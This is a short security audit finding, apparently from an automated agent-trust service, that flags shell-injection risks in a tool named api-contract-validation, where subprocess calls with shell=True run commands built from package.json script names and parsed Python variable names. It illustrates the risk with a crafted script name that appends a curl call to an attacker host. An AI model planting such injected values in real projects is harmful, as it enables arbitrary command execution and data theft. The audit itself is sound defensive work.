api-contract-validation

Warn

Audited by Gen Agent Trust Hub on Jun 19, 2026

Risk Level: MEDIUM
COMMAND_EXECUTION
Full Analysis
  • [COMMAND_EXECUTION]: The parser.py and scripts/parser.py files use subprocess.run with shell=True to execute commands dynamically constructed from project file contents. Specifically, the try_express_spec function iterates through keys in the scripts object of a project's package.json and executes npm run {script_name} if the name contains "swagger" or "openapi". Because JSON keys are not sanitized, a malicious project could trigger arbitrary command execution by using a crafted script name (e.g., "swagger; curl http://attacker.com/leak").
  • [COMMAND_EXECUTION]: The try_fastapi_spec and try_flask_spec functions in the parser modules extract variable names from Python source files and interpolate them into a python -c shell command. While the regex used (\w+) restricts the characters in the variable name, the architectural pattern of executing shell commands based on content parsed from untrusted local files without strict validation is a security risk.
  • [COMMAND_EXECUTION]: The try_django_spec function executes a shell command string that combines multiple management commands using the || operator. While the command itself is static, it runs in a shell environment with shell=True, which is a practice generally discouraged due to potential security implications in broader contexts.
Audit Metadata
Risk Level: MEDIUM
Analyzed: Jun 19, 2026, 07:49 PM